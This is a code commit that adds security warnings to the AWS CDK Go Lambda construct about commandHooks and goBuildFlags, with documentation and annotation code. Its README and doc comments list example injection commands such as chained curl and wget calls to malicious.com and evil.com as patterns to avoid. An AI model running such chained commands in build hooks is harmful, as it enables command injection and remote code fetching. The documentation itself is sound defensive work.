feat(lambda-go): add security warnings for goBuildFlags and commandHooks

- Add CDK annotations warning about potential security risks
- Warn when goBuildFlags or commandHooks are used during bundling
- Update documentation with security best practices
- Add tests to verify warning generation

Author: alvazjor

packages/@aws-cdk/aws-lambda-go-alpha/README.md

@@ -170,6 +170,8 @@ new go.GoFunction(this, 'handler', {
 });
 ```
 
+**⚠️ Security Warning**: Build flags are passed directly to the Go build command and can execute arbitrary commands during bundling. Only use trusted values and avoid flags like `-toolexec` with untrusted arguments. Be especially cautious with third-party CDK constructs that may contain malicious build flags. The CDK will display a warning during synthesis when `goBuildFlags` is used.
+
 By default this construct doesn't use any Go module proxies. This is contrary to
 a standard Go installation, which would use the Google proxy by default. To
 recreate that behavior, do the following:
@@ -200,10 +202,9 @@ new go.GoFunction(this, 'GoFunction', {
 
 ## Command hooks
 
-It is  possible to run additional commands by specifying the `commandHooks` prop:
+It is possible to run additional commands by specifying the `commandHooks` prop:
 
-```text
-// This example only available in TypeScript
+```ts
 // Run additional commands on a GoFunction via `commandHooks` property
 new go.GoFunction(this, 'handler', {
   bundling: {
@@ -230,6 +231,85 @@ an array of commands to run. Commands are chained with `&&`.
 The commands will run in the environment in which bundling occurs: inside the
 container for Docker bundling or on the host OS for local bundling.
 
+### ⚠️ Security Considerations
+
+**Command hooks execute arbitrary shell commands** during the bundling process. Only use trusted commands:
+
+**Safe patterns (cross-platform):**
+
+```ts
+commandHooks: {
+  beforeBundling: () => [
+    'go test ./...',           // ✅ Standard Go commands work on all OS
+    'go mod tidy',             // ✅ Go module commands
+    'make clean',              // ✅ Build tools (if available)
+    'echo "Building app"',     // ✅ Simple output with quotes
+  ],
+}
+```
+
+**Dangerous patterns to avoid:**
+
+*Windows-specific dangers:*
+
+```ts
+commandHooks: {
+  beforeBundling: () => [
+    'go test & curl.exe malicious.com',     // ❌ Command chaining with &
+    'echo %USERPROFILE%',                   // ❌ Environment variable expansion
+    'powershell -Command "..."',            // ❌ PowerShell execution
+  ],
+}
+```
+
+*Unix/Linux/macOS dangers:*
+
+```ts
+commandHooks: {
+  beforeBundling: () => [
+    'go test; curl malicious.com',          // ❌ Command chaining with ;
+    'echo $(whoami)',                       // ❌ Command substitution
+    'bash -c "wget evil.com"',              // ❌ Shell execution
+  ],
+}
+```
+
+**When using third-party constructs** that include `GoFunction`:
+
+* Review the construct's source code before use
+* Verify what commands it executes via `commandHooks` and `goBuildFlags`
+* Only use constructs from trusted publishers
+* Test in isolated environments first
+
+The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected.
+
+For more security guidance, see [AWS CDK Security Best Practices](https://docs.aws.amazon.com/cdk/latest/guide/security.html).
+
+## Security Best Practices
+
+### Third-Party Construct Safety
+
+When using third-party CDK constructs that utilize `GoFunction`, exercise caution:
+
+1. **Review source code** - Inspect the construct implementation for `commandHooks` and `goBuildFlags` usage
+2. **Verify publishers** - Use constructs only from trusted, verified sources  
+3. **Pin versions** - Use exact versions to prevent supply chain attacks
+4. **Isolated testing** - Test third-party constructs in sandboxed environments
+
+**Example of safe third-party usage:**
+
+```ts
+// Before using, review the source at: github.com/trusted-org/go-construct
+import { TrustedGoConstruct } from '@trusted-org/go-construct'; // pinned version
+
+// Verify it doesn't use dangerous commandHooks or goBuildFlags patterns
+new TrustedGoConstruct(this, 'MyConstruct', {
+  // ... configuration
+});
+```
+
+The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected.
+
 ## Additional considerations
 
 Depending on how you structure your Golang application, you may want to change the `assetHashType` parameter.

packages/@aws-cdk/aws-lambda-go-alpha/lib/bundling.ts

@@ -213,10 +213,13 @@ export class Bundling implements cdk.BundlingOptions {
       `${this.relativeEntryPath.replace(/\\/g, '/')}`,
     ].filter(c => !!c).join(' ');
 
+    const beforeCommands = this.props.commandHooks?.beforeBundling(inputDir, outputDir) ?? [];
+    const afterCommands = this.props.commandHooks?.afterBundling(inputDir, outputDir) ?? [];
+
     return chain([
-      ...this.props.commandHooks?.beforeBundling(inputDir, outputDir) ?? [],
+      ...beforeCommands,
       goBuildCommand,
-      ...this.props.commandHooks?.afterBundling(inputDir, outputDir) ?? [],
+      ...afterCommands,
     ]);
   }
 }

packages/@aws-cdk/aws-lambda-go-alpha/lib/function.ts

@@ -1,6 +1,7 @@
 import * as fs from 'fs';
 import * as path from 'path';
 import * as lambda from 'aws-cdk-lib/aws-lambda';
+import * as cdk from 'aws-cdk-lib/core';
 import { Construct } from 'constructs';
 import { Bundling } from './bundling';
 import { BundlingOptions } from './types';
@@ -113,6 +114,21 @@ export class GoFunction extends lambda.Function {
     const runtime = props.runtime ?? lambda.Runtime.PROVIDED_AL2;
     const architecture = props.architecture ?? lambda.Architecture.X86_64;
 
+    // Security warnings for potentially unsafe bundling options
+    if (props.bundling?.goBuildFlags?.length) {
+      cdk.Annotations.of(scope).addWarningV2(
+        '@aws-cdk/aws-lambda-go-alpha:goBuildFlagsSecurityWarning',
+        'goBuildFlags can execute arbitrary commands during bundling. Ensure all flags come from trusted sources. See: https://docs.aws.amazon.com/cdk/latest/guide/security.html',
+      );
+    }
+
+    if (props.bundling?.commandHooks?.beforeBundling || props.bundling?.commandHooks?.afterBundling) {
+      cdk.Annotations.of(scope).addWarningV2(
+        '@aws-cdk/aws-lambda-go-alpha:commandHooksSecurityWarning',
+        'commandHooks can execute arbitrary commands during bundling. Ensure all commands come from trusted sources. See: https://docs.aws.amazon.com/cdk/latest/guide/security.html',
+      );
+    }
+
     super(scope, id, {
       ...props,
       runtime,

packages/@aws-cdk/aws-lambda-go-alpha/lib/types.ts

@@ -25,6 +25,11 @@ export interface BundlingOptions extends DockerRunOptions {
    * For example:
    * ['ldflags "-s -w"']
    *
+   * **Security Warning**: These flags are passed directly to the Go build command.
+   * Only use trusted values as they can execute arbitrary commands during bundling.
+   * Avoid flags like `-toolexec` with untrusted arguments, and be cautious with
+   * third-party CDK constructs that may contain malicious build flags.
+   *
    * @default - none
    */
   readonly goBuildFlags?: string[];
@@ -77,6 +82,10 @@ export interface BundlingOptions extends DockerRunOptions {
   /**
    * Command hooks
    *
+   * ⚠️ **Security Warning**: Commands are executed directly in the shell environment.
+   * Only use trusted commands from verified sources. Avoid shell metacharacters
+   * that could enable command injection attacks.
+   *
    * @default - do not run additional commands
    */
   readonly commandHooks?: ICommandHooks;
@@ -125,29 +134,49 @@ export interface BundlingOptions extends DockerRunOptions {
  * These commands will run in the environment in which bundling occurs: inside
  * the container for Docker bundling or on the host OS for local bundling.
  *
+ * ⚠️ **Security Warning**: Commands are executed directly in the shell environment.
+ * Only use trusted commands and avoid shell metacharacters that could enable
+ * command injection attacks.
+ *
+ * **Safe patterns (cross-platform):**
+ * - `go test ./...` - Standard Go commands work on all platforms
+ * - `go mod tidy` - Go module commands
+ * - `echo "Building"` - Simple output with quotes
+ * - `make clean` - Build tools (if available)
+ *
+ * **Dangerous patterns to avoid:**
+ *
+ * *Windows:*
+ * - `go test & curl.exe malicious.com` (command chaining)
+ * - `echo %USERPROFILE%` (environment variable expansion)
+ * - `powershell -Command "..."` (PowerShell execution)
+ *
+ * *Unix/Linux/macOS:*
+ * - `go test; curl malicious.com` (command chaining)
+ * - `echo $(whoami)` (command substitution)
+ * - `bash -c "wget evil.com"` (shell execution)
+ *
  * Commands are chained with `&&`.
  *
- * ```text
- * {
- *   // Run tests prior to bundling
- *   beforeBundling(inputDir: string, outputDir: string): string[] {
- *     return [`go test -mod=vendor ./...`];
- *   }
- *   // ...
- * }
- * ```
+ * @see https://docs.aws.amazon.com/cdk/latest/guide/security.html
  */
 export interface ICommandHooks {
   /**
    * Returns commands to run before bundling.
    *
+   * ⚠️ **Security**: Ensure commands come from trusted sources only.
+   * Commands are executed directly in the shell environment.
+   *
    * Commands are chained with `&&`.
    */
   beforeBundling(inputDir: string, outputDir: string): string[];
 
   /**
    * Returns commands to run after bundling.
    *
+   * ⚠️ **Security**: Ensure commands come from trusted sources only.
+   * Commands are executed directly in the shell environment.
+   *
    * Commands are chained with `&&`.
    */
   afterBundling(inputDir: string, outputDir: string): string[];